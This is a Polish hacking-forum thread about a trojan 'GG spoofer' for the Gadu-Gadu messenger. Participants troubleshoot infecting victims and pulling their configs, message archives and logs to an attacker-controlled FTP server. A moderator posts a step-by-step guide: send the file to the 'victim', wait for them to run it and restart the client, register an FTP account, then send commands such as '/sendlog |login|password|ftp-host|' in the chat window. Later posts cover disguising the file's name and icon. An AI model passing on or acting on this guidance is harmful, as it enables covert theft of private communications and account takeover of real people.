GG spoofer by Grzonu

strugel

Użytkownik
Dołączył
Czerwiec 13, 2008
Posty
3
Witam!

Grzonu, lub czy ktoś inny mógł by mi odpowiedzieć, dlaczego jak wpisuje komendę, żeby mi configi, i archiwum wysłało a ftp, to ofiara widzi te komendy, a na ftp są wysyłane moje configi i archiwum. Gdyby mógł mi ktoś to wytłumaczyć to był bym wdzięczny.

Pozdrawiam
smile.gif
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
twoje nie moga isc tylko ofiary to raz. dwa jesli kod jest wykonywany (archiwum jest wysyłane) to ustawiana jest flaga 0x0010 na wiadomosc co klient interpretuje jako "wiadomość dla klienta" i nie wyświetla jej wiec czegos tu nie rozumiem czyje wkoncu archiwum jest na ftp??
 

Szymon111

Użytkownik
Dołączył
Grudzień 11, 2006
Posty
59
ja tego używałem u siebie na kompie, pisałem na drugie konto i wtedy dostawałem takie wiadomości: dll się dodało i wysyłałem komendy i ona pojawiały się w drugim oknie
/help
13084995 (11-06-2008 21:09)
WŁĄCZONO
13084995 (11-06-2008 21:10)
/5p00f_0n |1186700|
13084995 (11-06-2008 21:11)
?



Więc pokazują się chyba u odbiorcy
 

strugel

Użytkownik
Dołączył
Czerwiec 13, 2008
Posty
3
No kurcze nic nie pomaga, mógł by ktoś napisać do mnie na gg: 4084242, i mogę pokazać, ze widać komendy, a ftp nadal jest puste
<
Proszę o pomoc w tej sprawie.
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
a cba nie ma swojej strony ?? lol poczytaj tam. po 2 jak testujesz na sobie to wez odpal gg bez dll`ki jedno i jedno z dll`ka
 

strugel

Użytkownik
Dołączył
Czerwiec 13, 2008
Posty
3
Addameczek, chyba raczej tak:

/sendlog |nazwastrony.cba.pl|hasło|nazwa.cba.pl|

bez e-maila
<



EDIT#1

Pomoże mi ktoś z tym, bo robie tak jak pisze i nie wychodzi mi :/
 

addameczek

Użytkownik
Dołączył
Maj 12, 2008
Posty
4
Już wszystko OK;)
Wielki Dzięki nie zostawiałem przerwy pomiędzy: /sendlog a |login|
A co do archiwum to poszukajcie na gogle jest fajny program do przetwarzania archiwum do natatnika:)
Dzieeki za zajebist* programik nie wiesz jak mi pomogles:)
 

PawełMKM

Użytkownik
Dołączył
Czerwiec 15, 2008
Posty
2
Witam, mógłby mi ktoś z was to wytłumaczyć od podstaw ? tzn. wiem tylko że :
Muszę wysłać komuś ten programik i musi go uruchomić. następnie zresetować gg aby program zadziałał.
A co dalej ? mam konto na strefa.pl ale nie wiem co mam zrobić mam wysłać tam ten plik ? i gdzie mam wpisywać ten "kod"
/sendlog |admin@nazwa_stronyl|haslo|ftp.strefa.pl|

Proszę o wytłumaczenie tego mi bo jestem tutaj nowy i jeszcze zielony... Na pewno też ten poradnik przyda się innym "zielonką"
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
komu mam jeszcze mowic ze
1) KOMENDY WPISUJEMY W OKNIE ROZMOWY
2) NIE PYTAJ O KONFIGURACJE SERWERA TYLKO SPRAWDZ JA SOBIE NA STRONIE w jakims dziale pomoc/faq jest to napewno

wiec tak teraz poradnik od nowa ale ostrzegam że jak jeszcze ktoś nie zrozumie jak ma wyslać polecenie albo zalyta o konfiguracje serwera to udusze

1) wysyłamy plik do ofiary.... nie nie nic nie konfigurujemy
2) czekamy az ofiara otworzy plik i zresetuje gg
3) zakładamy sobie konto ftp najlepiej na drivehq.com ---- rejestrujemy sie klikając "sign up"
4) sprawdzamy sobie parametry połączenia z serwerem..... nie nie lecimy odrazu z głupim pytaniem na forum o prawidłową konfiguracje
5) wysyłamy do ofiary komunikat np. /help ....tak tak w okienku rozmowy
6)jesli dostaniemy odpowiedz to znaczy ze wszystko działa jesli nie to oznacza ze albo ofiara jeszcze nie zresetowala gg albo uzywa/uzywala innego komunikatora ktory jest domyslną aplikcja obsługująca protokol gg
7) cieszymy sie z dostepu do gg ofiary
8) jeśli nie rozumiemy czegos to sprawdzamy nastepujące witryny google jesli nie ma to wikipedie jesli nie ma to dopiero forum ... nie nie dokładnie w takiej kolejnosci nie innej
 

PawełMKM

Użytkownik
Dołączył
Czerwiec 15, 2008
Posty
2
Dzięki
<
Ale mam jeszcze kilka pytań, na które nie znalazłem odpowiedzi :

1 - Czy mogę zmienić nazwę pliku (oczywiście bez rozszerzenie)
2 - Czy mogę zmienić ikonę pliku ?
3 - I Czy hasło które dostajemy jest na serwer czy tylko jako zabezpieczenie ?
<
 

nitr0

Użytkownik
Dołączył
Maj 15, 2007
Posty
537
1. tak
2. tak
3. chodzi Ci o hasło do archiwum? xP jeśli tak to jest o tym napisane klilka linijek wyżej xP
 

di36o

Użytkownik
Dołączył
Wrzesień 4, 2007
Posty
7
Kurde panowie mam problem . Nie uploaduje mi sie archiwum na ftp i logi tez . Jest to o tyle dziwne ,ze config elegancko sie wysyla a archiwum i logi nie :/ Czym to moze byc podyktowane ? Serwer ftp mam z cba.pl
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
moze ofiara nie archiwizuje wiadomosci ?
 

di36o

Użytkownik
Dołączył
Wrzesień 4, 2007
Posty
7
kurde własnie jestem pewien ze archiwizuje :/ Sprobuje jeszcze z innym ftp , ale skoro configi wysyła to nie wiem czy to cokolwiek da .
 
Do góry Bottom